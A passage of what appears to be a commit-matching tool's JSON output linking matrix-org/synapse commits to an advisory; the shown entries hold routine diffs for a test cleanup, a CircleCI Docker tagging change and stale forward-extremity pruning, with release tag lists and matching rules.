"v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8941, 8941", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8941, 8876", + "relevance": 2 + } + ] + }, + { + "commit_id": "c9c1c9d82f190abc2f1254f75fe42bf29eff08e1", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608220000, + "hunks": 5, + "message": "Fix `UsersListTestCase` (#8964)", + "diff": [ + "diff --git a/changelog.d/8964.bugfix b/changelog.d/8964.bugfix", + "new file mode 100644", + "index 000000000..295933d6c", + "--- /dev/null", + "+++ b/changelog.d/8964.bugfix", + "@@ -0,0 +1 @@", + "+Fix a bug where deactivated users appeared in the user directory when their profile information was updated.", + "diff --git a/tests/rest/admin/test_user.py b/tests/rest/admin/test_user.py", + "index 9d6ef0251..9b2e4765f 100644", + "--- a/tests/rest/admin/test_user.py", + "+++ b/tests/rest/admin/test_user.py", + "@@ -491,5 +491,3 @@ class UsersListTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=other_user_token,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=other_user_token)", + "@@ -542,3 +540,3 @@ class UsersListTestCase(unittest.HomeserverTestCase):", + " url = self.url + \"?%s=%s\" % (search_field, search_term,)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", + "@@ -1028,3 +1026,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -1046,3 +1044,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\"," + ], + "changed_files": [ + "changelog.d/8964.bugfix", + "tests/rest/admin/test_user.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8964": "Clean up tox.ini #8963" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8964, 8964", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8964", + "relevance": 2 + } + ] + }, + { + "commit_id": "dc016c66ae228fc6496de35928ea3096cba80267", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607619629, + "hunks": 3, + "message": "Don't publish `latest` docker image until all archs are built (#8909)", + "diff": [ + "diff --git a/.circleci/config.yml b/.circleci/config.yml", + "index 088da5573..375a7f7b0 100644", + "--- a/.circleci/config.yml", + "+++ b/.circleci/config.yml", + "@@ -9,2 +9,4 @@ jobs:", + " - run: docker login --username $DOCKER_HUB_USERNAME --password $DOCKER_HUB_PASSWORD", + "+ # for release builds, we want to get the amd64 image out asap, so first", + "+ # we do an amd64-only build, before following up with a multiarch build.", + " - docker_build:", + "@@ -23,5 +25,4 @@ jobs:", + " - run: docker login --username $DOCKER_HUB_USERNAME --password $DOCKER_HUB_PASSWORD", + "- - docker_build:", + "- tag: -t matrixdotorg/synapse:latest", + "- platforms: linux/amd64", + "+ # for `latest`, we don't want the arm images to disappear, so don't update the tag", + "+ # until all of the platforms are built.", + " - docker_build:", + "diff --git a/changelog.d/8909.misc b/changelog.d/8909.misc", + "new file mode 100644", + "index 000000000..b45972f0f", + "--- /dev/null", + "+++ b/changelog.d/8909.misc", + "@@ -0,0 +1 @@", + "+Don't publish `latest` docker image until all archs are built." + ], + "changed_files": [ + ".circleci/config.yml", + "changelog.d/8909.misc" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8909": "" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8909, 8909", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8909", + "relevance": 2 + } + ] + }, + { + "commit_id": "70586aa63eaf129505324976fb092cb3ad327590", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608284958, + "hunks": 18, + "message": "Try and drop stale extremities. (#8929) If we see stale extremities while persisting events, and notice that they don't change the result of state resolution, we drop them.", + "diff": [ + "diff --git a/changelog.d/8929.misc b/changelog.d/8929.misc", + "new file mode 100644", + "index 000000000..157018b6a", + "--- /dev/null", + "+++ b/changelog.d/8929.misc", + "@@ -0,0 +1 @@", + "+Automatically drop stale forward-extremities under some specific conditions.", + "diff --git a/synapse/api/constants.py b/synapse/api/constants.py", + "index 1932df83b..565a8cd76 100644", + "--- a/synapse/api/constants.py", + "+++ b/synapse/api/constants.py", + "@@ -97,2 +97,4 @@ class EventTypes:", + "+ Dummy = \"org.matrix.dummy_event\"", + "+", + "diff --git a/synapse/handlers/message.py b/synapse/handlers/message.py", + "index 2b8aa9443..9dfeab09c 100644", + "--- a/synapse/handlers/message.py", + "+++ b/synapse/handlers/message.py", + "@@ -1263,3 +1263,3 @@ class EventCreationHandler:", + " {", + "- \"type\": \"org.matrix.dummy_event\",", + "+ \"type\": EventTypes.Dummy,", + " \"content\": {},", + "diff --git a/synapse/storage/persist_events.py b/synapse/storage/persist_events.py", + "index 70e636b0b..61fc49c69 100644", + "--- a/synapse/storage/persist_events.py", + "+++ b/synapse/storage/persist_events.py", + "@@ -33,3 +33,10 @@ from synapse.storage.databases import Databases", + " from synapse.storage.databases.main.events import DeltaState", + "-from synapse.types import Collection, PersistedEventPosition, RoomStreamToken, StateMap", + "+from synapse.storage.databases.main.events_worker import EventRedactBehaviour", + "+from synapse.types import (", + "+ Collection,", + "+ PersistedEventPosition,", + "+ RoomStreamToken,", + "+ StateMap,", + "+ get_domain_from_id,", + "+)", + " from synapse.util.async_helpers import ObservableDeferred", + "@@ -70,2 +77,17 @@ stale_forward_extremities_counter = Histogram(", + "+state_resolutions_during_persistence = Counter(", + "+ \"synapse_storage_events_state_resolutions_during_persistence\",", + "+ \"Number of times we had to do state res to calculate new current state\",", + "+)", + "+", + "+potential_times_prune_extremities = Counter(", + "+ \"synapse_storage_events_potential_times_prune_extremities\",", + "+ \"Number of times we might be able to prune extremities\",", + "+)", + "+", + "+times_pruned_extremities = Counter(", + "+ \"synapse_storage_events_times_pruned_extremities\",", + "+ \"Number of times we were actually be able to prune extremities\",", + "+)", + "+", + "@@ -456,3 +478,11 @@ class EventsPersistenceStorage:", + " )", + "- current_state, delta_ids = res", + "+ current_state, delta_ids, new_latest_event_ids = res", + "+", + "+ # there should always be at least one forward extremity.", + "+ # (except during the initial persistence of the send_join", + "+ # results, in which case there will be no existing", + "+ # extremities, so we'll `continue` above and skip this bit.)", + "+ assert new_latest_event_ids, \"No forward extremities left!\"", + "+", + "+ new_forward_extremeties[room_id] = new_latest_event_ids", + "@@ -575,5 +605,5 @@ class EventsPersistenceStorage:", + " events_context: List[Tuple[EventBase, EventContext]],", + "- old_latest_event_ids: Iterable[str],", + "- new_latest_event_ids: Iterable[str],", + "- ) -> Tuple[Optional[StateMap[str]], Optional[StateMap[str]]]:", + "+ old_latest_event_ids: Set[str],", + "+ new_latest_event_ids: Set[str],", + "+ ) -> Tuple[Optional[StateMap[str]], Optional[StateMap[str]], Set[str]]:", + " \"\"\"Calculate the current state dict after adding some new events to", + "@@ -582,12 +612,12 @@ class EventsPersistenceStorage:", + " Args:", + "- room_id (str):", + "+ room_id:", + " room to which the events are being added. Used for logging etc", + "- events_context (list[(EventBase, EventContext)]):", + "+ events_context:", + " events and contexts which are being added to the room", + "- old_latest_event_ids (iterable[str]):", + "+ old_latest_event_ids:", + " the old forward extremities for the room.", + "- new_latest_event_ids (iterable[str]):", + "+ new_latest_event_ids :", + " the new forward extremities for the room.", + "@@ -595,5 +625,11 @@ class EventsPersistenceStorage:", + " Returns:", + "- Returns a tuple of two state maps, the first being the full new current", + "- state and the second being the delta to the existing current state.", + "- If both are None then there has been no change.", + "+ Returns a tuple of two state maps and a set of new forward", + "+ extremities.", + "+", + "+ The first state map is the full new current state and the second", + "+ is the delta to the existing current state. If both are None then", + "+ there has been no change.", + "+", + "+ The function may prune some old entries from the set of new", + "+ forward extremities if it's safe to do so.", + "@@ -674,3 +710,3 @@ class EventsPersistenceStorage:", + " if old_state_groups == new_state_groups:", + "- return None, None", + "+ return None, None, new_latest_event_ids", + "@@ -691,3 +727,3 @@ class EventsPersistenceStorage:", + " new_state = state_groups_map.get(new_state_group)", + "- return new_state, delta_ids", + "+ return new_state, delta_ids, new_latest_event_ids", + "@@ -703,3 +739,3 @@ class EventsPersistenceStorage:", + " # state is.", + "- return state_groups_map[new_state_groups.pop()], None", + "+ return state_groups_map[new_state_groups.pop()], None, new_latest_event_ids", + "@@ -736,3 +772,135 @@ class EventsPersistenceStorage:", + "- return res.state, None", + "+ state_resolutions_during_persistence.inc()", + "+", + "+ # If the returned state matches the state group of one of the new", + "+ # forward extremities then we check if we are able to prune some state", + "+ # extremities.", + "+ if res.state_group and res.state_group in new_state_groups:", + "+ new_latest_event_ids = await self._prune_extremities(", + "+ room_id,", + "+ new_latest_event_ids,", + "+ res.state_group,", + "+ event_id_to_state_group,", + "+ events_context,", + "+ )", + "+", + "+ return res.state, None, new_latest_event_ids", + "+", + "+ async def _prune_extremities(", + "+ self,", + "+ room_id: str,", + "+ new_latest_event_ids: Set[str],", + "+ resolved_state_group: int,", + "+ event_id_to_state_group: Dict[str, int],", + "+ events_context: List[Tuple[EventBase, EventContext]],", + "+ ) -> Set[str]:", + "+ \"\"\"See if we can prune any of the extremities after calculating the", + "+ resolved state.", + "+ \"\"\"", + "+ potential_times_prune_extremities.inc()", + "+", + "+ # We keep all the extremities that have the same state group, and", + "+ # see if we can drop the others.", + "+ new_new_extrems = {", + "+ e", + "+ for e in new_latest_event_ids", + "+ if event_id_to_state_group[e] == resolved_state_group", + "+ }", + "+", + "+ dropped_extrems = set(new_latest_event_ids) - new_new_extrems", + "+", + "+ logger.debug(\"Might drop extremities: %s\", dropped_extrems)", + "+", + "+ # We only drop events from the extremities list if:", + "+ # 1. we're not currently persisting them;", + "+ # 2. they're not our own events (or are dummy events); and", + "+ # 3. they're either:", + "+ # 1. over N hours old and more than N events ago (we use depth to", + "+ # calculate); or", + "+ # 2. we are persisting an event from the same domain and more than", + "+ # M events ago.", + "+ #", + "+ # The idea is that we don't want to drop events that are \"legitimate\"", + "+ # extremities (that we would want to include as prev events), only", + "+ # \"stuck\" extremities that are e.g. due to a gap in the graph.", + "+ #", + "+ # Note that we either drop all of them or none of them. If we only drop", + "+ # some of the events we don't know if state res would come to the same", + "+ # conclusion.", + "+", + "+ for ev, _ in events_context:", + "+ if ev.event_id in dropped_extrems:", + "+ logger.debug(", + "+ \"Not dropping extremities: %s is being persisted\", ev.event_id", + "+ )", + "+ return new_latest_event_ids", + "+", + "+ dropped_events = await self.main_store.get_events(", + "+ dropped_extrems,", + "+ allow_rejected=True,", + "+ redact_behaviour=EventRedactBehaviour.AS_IS,", + "+ )", + "+", + "+ new_senders = {get_domain_from_id(e.sender) for e, _ in events_context}", + "+", + "+ one_day_ago = self._clock.time_msec() - 24 * 60 * 60 * 1000", + "+ current_depth = max(e.depth for e, _ in events_context)", + "+ for event in dropped_events.values():", + "+ # If the event is a local dummy event then we should check it", + "+ # doesn't reference any local events, as we want to reference those", + "+ # if we send any new events.", + "+ #", + "+ # Note we do this recursively to handle the case where a dummy event", + "+ # references a dummy event that only references remote events.", + "+ #", + "+ # Ideally we'd figure out a way of still being able to drop old", + "+ # dummy events that reference local events, but this is good enough", + "+ # as a first cut.", + "+ events_to_check = [event]", + "+ while events_to_check:", + "+ new_events = set()", + "+ for event_to_check in events_to_check:", + "+ if self.is_mine_id(event_to_check.sender):", + "+ if event_to_check.type != EventTypes.Dummy:", + "+ logger.debug(\"Not dropping own event\")", + "+ return new_latest_event_ids", + "+ new_events.update(event_to_check.prev_event_ids())", + "+", + "+ prev_events = await self.main_store.get_events(", + "+ new_events,", + "+ allow_rejected=True,", + "+ redact_behaviour=EventRedactBehaviour.AS_IS,", + "+ )", + "+ events_to_check = prev_events.values()", + "+", + "+ if (", + "+ event.origin_server_ts < one_day_ago", + "+ and event.depth < current_depth - 100", + "+ ):", + "+ continue", + "+", + "+ # We can be less conservative about dropping extremities from the", + "+ # same domain, though we do want to wait a little bit (otherwise", + "+ # we'll immediately remove all extremities from a given server).", + "+ if (", + "+ get_domain_from_id(event.sender) in new_senders", + "+ and event.depth < current_depth - 20", + "+ ):", + "+ continue", + "+", + "+ logger.debug(", + "+ \"Not dropping as too new and not in new_senders: %s\", new_senders,", + "+ )", + "+", + "+ return new_latest_event_ids", + "+", + "+ times_pruned_extremities.inc()", + "+", + "+ logger.info(", + "+ \"Pruning forward extremities in room %s: from %s -> %s\",", + "+ room_id,", + "+ new_latest_event_ids,", + "+ new_new_extrems,", + "+ )", + "+ return new_new_extrems", + "diff --git a/synapse/visibility.py b/synapse/visibility.py", + "index f2836ba9f..ec50e7e97 100644", + "--- a/synapse/visibility.py", + "+++ b/synapse/visibility.py", + "@@ -127,3 +127,3 @@ async def filter_events_for_client(", + " if filter_send_to_client:", + "- if event.type == \"org.matrix.dummy_event\":", + "+ if event.type == EventTypes.Dummy:", + " return None", + "diff --git a/tests/storage/test_events.py b/tests/storage/test_events.py", + "new file mode 100644", + "index 000000000..71210ce60", + "--- /dev/null", + "+++ b/tests/storage/test_events.py", + "@@ -0,0 +1,334 @@", + "+# -*- coding: utf-8 -*-", + "+# Copyright 2020 The Matrix.org Foundation C.I.C.", + "+#", + "+# Licensed under the Apache License, Version 2.0 (the \"License\");", + "+# you may not use this file except in compliance with the License.", + "+# You may obtain a copy of the License at", + "+#", + "+# http://www.apache.org/licenses/LICENSE-2.0", + "+#", + "+# Unless required by applicable law or agreed to in writing, software", + "+# distributed under the License is distributed on an \"AS IS\" BASIS,", + "+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+# See the License for the specific language governing permissions and", + "+# limitations under the License.", + "+", + "+", + "+from synapse.api.constants import EventTypes, Membership", + "+from synapse.api.room_versions import RoomVersions", + "+from synapse.federation.federation_base import event_from_pdu_json", + "+from synapse.rest import admin", + "+from synapse.rest.client.v1 import login, room", + "+", + "+from tests.unittest import HomeserverTestCase", + "+", + "+", + "+class ExtremPruneTestCase(HomeserverTestCase):", + "+ servlets = [", + "+ admin.register_servlets,", + "+ room.register_servlets,", + "+ login.register_servlets,", + "+ ]", + "+", + "+ def prepare(self, reactor, clock, homeserver):", + "+ self.state = self.hs.get_state_handler()", + "+ self.persistence = self.hs.get_storage().persistence", + "+ self.store = self.hs.get_datastore()", + "+", + "+ self.register_user(\"user\", \"pass\")", + "+ self.token = self.login(\"user\", \"pass\")", + "+", + "+ self.room_id = self.helper.create_room_as(", + "+ \"user\", room_version=RoomVersions.V6.identifier, tok=self.token", + "+ )", + "+", + "+ body = self.helper.send(self.room_id, body=\"Test\", tok=self.token)", + "+ local_message_event_id = body[\"event_id\"]", + "+", + "+ # Fudge a remote event and persist it. This will be the extremity before", + "+ # the gap.", + "+ self.remote_event_1 = event_from_pdu_json(", + "+ {", + "+ \"type\": EventTypes.Message,", + "+ \"state_key\": \"@user:other\",", + "+ \"content\": {},", + "+ \"room_id\": self.room_id,", + "+ \"sender\": \"@user:other\",", + "+ \"depth\": 5,", + "+ \"prev_events\": [local_message_event_id],", + "+ \"auth_events\": [],", + "+ \"origin_server_ts\": self.clock.time_msec(),", + "+ },", + "+ RoomVersions.V6,", + "+ )", + "+", + "+ self.persist_event(self.remote_event_1)", + "+", + "+ # Check that the current extremities is the remote event.", + "+ self.assert_extremities([self.remote_event_1.event_id])", + "+", + "+ def persist_event(self, event, state=None):", + "+ \"\"\"Persist the event, with optional state", + "+ \"\"\"", + "+ context = self.get_success(", + "+ self.state.compute_event_context(event, old_state=state)", + "+ )", + "+ self.get_success(self.persistence.persist_event(event, context))", + "+", + "+ def assert_extremities(self, expected_extremities):", + "+ \"\"\"Assert the current extremities for the room", + "+ \"\"\"", + "+ extremities = self.get_success(", + "+ self.store.get_prev_events_for_room(self.room_id)", + "+ )", + "+ self.assertCountEqual(extremities, expected_extremities)", + "+", + "+ def test_prune_gap(self):", + "+ \"\"\"Test that we drop extremities after a gap when we see an event from", + "+ the same domain.", + "+ \"\"\"", + "+", + "+ # Fudge a second event which points to an event we don't have. This is a", + "+ # state event so that the state changes (otherwise we won't prune the", + "+ # extremity as they'll have the same state group).", + "+ remote_event_2 = event_from_pdu_json(", + "+ {", + "+ \"type\": EventTypes.Member,", + "+ \"state_key\": \"@user:other\",", + "+ \"content\": {\"membership\": Membership.JOIN},", + "+ \"room_id\": self.room_id,", + "+ \"sender\": \"@user:other\",", + "+ \"depth\": 50,", + "+ \"prev_events\": [\"$some_unknown_message\"],", + "+ \"auth_events\": [],", + "+ \"origin_server_ts\": self.clock.time_msec(),", + "+ },", + "+ RoomVersions.V6,", + "+ )", + "+", + "+ state_before_gap = self.get_success(self.state.get_current_state(self.room_id))", + "+", + "+ self.persist_event(remote_event_2, state=state_before_gap.values())", + "+", + "+ # Check the new extremity is just the new remote event.", + "+ self.assert_extremities([remote_event_2.event_id])", + "+", + "+ def test_do_not_prune_gap_if_state_different(self):", + "+ \"\"\"Test that we don't prune extremities after a gap if the resolved", + "+ state is different.", + "+ \"\"\"", + "+", + "+ # Fudge a second event which points to an event we don't have.", + "+ remote_event_2 = event_from_pdu_json(", + "+ {", + "+ \"type\": EventTypes.Message,", + "+ \"state_key\": \"@user:other\",", + "+ \"content\": {},", + "+ \"room_id\": self.room_id,", + "+ \"sender\": \"@user:other\",", + "+ \"depth\": 10,", + "+ \"prev_events\": [\"$some_unknown_message\"],", + 